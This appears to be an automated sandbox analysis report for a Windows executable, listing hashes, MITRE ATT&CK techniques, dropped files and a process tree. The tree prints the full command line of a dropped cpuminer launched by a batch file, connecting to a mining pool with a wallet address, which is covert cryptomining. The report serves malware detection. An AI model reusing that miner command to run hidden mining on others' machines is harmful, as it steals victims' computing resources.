73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
312s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
17-02-2024 08:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
408	b2e.exe
2204	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2204	cpuminer-sse2.exe
2204	cpuminer-sse2.exe
2204	cpuminer-sse2.exe
2204	cpuminer-sse2.exe
2204	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2868-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2868 wrote to memory of 408	2868	batexe.exe	85
PID 2868 wrote to memory of 408	2868	batexe.exe	85
PID 2868 wrote to memory of 408	2868	batexe.exe	85
PID 408 wrote to memory of 4820	408	b2e.exe	86
PID 408 wrote to memory of 4820	408	b2e.exe	86
PID 408 wrote to memory of 4820	408	b2e.exe	86
PID 4820 wrote to memory of 2204	4820	cmd.exe	89
PID 4820 wrote to memory of 2204	4820	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Users\Admin\AppData\Local\Temp\98A1.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\98A1.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\98A1.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2FF.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4820
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\98A1.tmp\b2e.exe

Filesize
5.5MB

MD5
693c6ebe7d68cfb7e3b21f56ad86a205

SHA1
522d37be5ba601801f15de53f402268937ccef69

SHA256
535e437338c1c4a7d8a32790e4cf0fd79d34b50d7089ed62bf9c4256964bdeb2

SHA512
2d87711e0db9f18fc7ed8a22eec558e21cc7a1a6f8c0446af5638c7318c4b32db0548254d466ace81adfef2fa3551969a0d15b318c1da71b4cc25a522079dcbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\98A1.tmp\b2e.exe

Filesize
4.4MB

MD5
199edf80afea99aafb2213d639fca0c3

SHA1
e91a227b2192c5a2188aa3a032d16681f99ac764

SHA256
4bf1e21b0a4a2b174cb4ed0846c0654a9a42de06fcdd7bd06263ba3bd02de2b2

SHA512
16b7912be8a62b8d461727eaa9f7117f62b169c16f0962e3a3af956956b4202a40c755ea060999af6563f8639691ed4c7dc309df30b1880367bf7b7bde28ca7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\98A1.tmp\b2e.exe

Filesize
3.0MB

MD5
aac973d8e45f0ad7b275e5b32d8f585a

SHA1
89bb597eb9094dbef75ecba8f2e0399011cbf816

SHA256
ed8626c305ace2c453f836b177cc55cdf0a04da526d3ad32d4b1a1231900bad5

SHA512
f7c32b6f15c4011608f634d983cfdfbc2410869cc72a967a67ec0c34641ab4b558345910daf7d402818ed3875918ac3276476e703fd162e802dba8a79f6d6c6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\B2FF.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
985KB

MD5
872acb2de74cbf19019e8ad8f1315bba

SHA1
a8e08952b8f293b84e643147b3b09e50f4635866

SHA256
fb7ad2da804bdafa9dc7441eb5e974db501a6d2d981262b15921586e7ff6c426

SHA512
1afdde2420c86a612c0b619c76ccd83ad2698c3fc3fa3235e042b94cf476e42b6e866361cc5e64bf3b7464de589b1e362d486f6a2508f0ec47b1311d4280ff78

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
d6a2651ce86560ec77259efc3df246fa

SHA1
1e72d8e5049a66e1f257d00847fae193c2f8bb02

SHA256
1703f2c16ca81fd8d53d899d0c191db61af986281cdaf3939e9aafcb2aa377a6

SHA512
eece650394d481935c42793702efa7220ae51d92e50dde346b62026d1946418011f665dabe217b6e775b79d65b7580652299a816961a23880abff400ee14201b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
781KB

MD5
f20ef8e9ffde46b5d8192312711fc2bb

SHA1
2811f07e63cf65b60eaa2e9415fc0ac593043db8

SHA256
1e7096f902f50dfc09b265c15c16ae50942222c0492c5ad677070aebfd5874a7

SHA512
f15bb04e38edbaddc0774d5261c0eb0c1df009a88c44dcccd493fb8396ba5d25cc1d2698cc1f38e6a4145144f43cb41aa29b4ba87b4cc9436f16f69b3cc65027

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
550KB

MD5
90e284ef3138b09ae775fbc28c5f24ea

SHA1
42207d91d69b9ba1fa5d29b37b4b2f1528b95833

SHA256
4b1f00ae6d666aeb5e2753fe18f121e81c58f1e12a58dea6fb2b454036db21c2

SHA512
cc950f51a554fa216b2fa0e6a5f6778429015644ff79e5b174846fa957c3e97451d6a42b045e5f5d60330976fd692ab21d1c7019446297bdbc3e26ccdc0ef56d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
859KB

MD5
3fa85b95000b2073f099043bb4ebf77e

SHA1
6203e1a52f86863d1cce9746e99f8defb57bd950

SHA256
a77cddaec081a2e80befdf672a14ffa17bb63f3f46c2f48473b9ac3b9e73d6f7

SHA512
e19bd47fe738ba2afdf2733fde9fbdde1508929568f0706c1a780613b0091c4f69b3f1f14964ba73839c22cd6d456b0bab300232a442c76130bb715ed8c51423

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
502KB

MD5
8af42634e384214fc0d181b182cf461b

SHA1
37dbb7eccf1225a9cbc31f6c4d959faf2cdf15c2

SHA256
48b7a2d6af1d8d27c284e445770a186aa8177f565991bc4f2025d5ec4a250bd7

SHA512
095d4bb003f82c378b936f70ba85140bafdd56a180db7ce16d2b25c5304c02eca919492e01acb4a4989927a7e7824bf3fedd4939f12c3ba54233f035052bd216

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
3c3c46d1fff7df11fdb651871588faf1

SHA1
24f2031ccef66179f07bb049fb85f830e5d8d442

SHA256
45d2326357f0cb9dd3590b7259f73c09c2bde9b440f65d01af51c9712072c87a

SHA512
dbed3d1328fb7d98f47199a7c5202805e5b217f893f2856678a485d56e70c493df0ce01ad4ade02c109e5d7fa2d45a8074bee38d080c95adfac867d75db6f61c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
352KB

MD5
7e2d09181cb5d663fdd92fec5221e62a

SHA1
887df7fcbf3b51ad23d011b81df1ecd6ee5d9131

SHA256
b112482203aeaa510cdb75567ef308d3c6251f29adba5747865285399961ecd5

SHA512
15a1e7f98f851c11605b2221ed1c4506b664c9b30c32e3d298fcf5097ca06a4412a186aa9a7bfea5a6b6266dfb0bffd903531b477d26127970df0d0a32f6f97d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
321KB

MD5
00b23e73b0fa692fd8b168a99f96c8cf

SHA1
5cc7f2ed47056d4324b66cbccab620b38a1cd634

SHA256
2317913cb2ed30ae972f1188a85c8b5a76389a59bf8a9f769534890561b4b813

SHA512
a28211d474230125cc6e12a8b47195a202b885d694ac756cf56cc0d33aaa292e2e76b37b65b0c57462ff50d96c7df3419b0be2d7b7e421c3d5d36a0b5d22aecf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
485KB

MD5
c80620baa15c229eb83c50075559fce6

SHA1
fa2b1da52691277a6ccadefb3fe197d7e398eb57

SHA256
b15afe5edecd8ad4b89e4c6332694efc99f26e62be9357e9bebba4b3c8783ca4

SHA512
0ad7bcfecaaa99d62e3cfbc4c7a646612ddfcb7f454c6f3bc3da09439cbe7c2dd1c11a2a4a73693fd500ebd7afb4199ba862f3735f3c78c4a81f668199c11403

Download Submit
memory/408-54-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/408-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2204-49-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-65-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2204-47-0x000000006F190000-0x000000006F228000-memory.dmp

Filesize
608KB

Download
memory/2204-48-0x0000000000D40000-0x00000000025F5000-memory.dmp

Filesize
24.7MB

Download
memory/2204-44-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-105-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-55-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-60-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2204-70-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-75-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-80-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-90-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-95-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2204-100-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2868-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download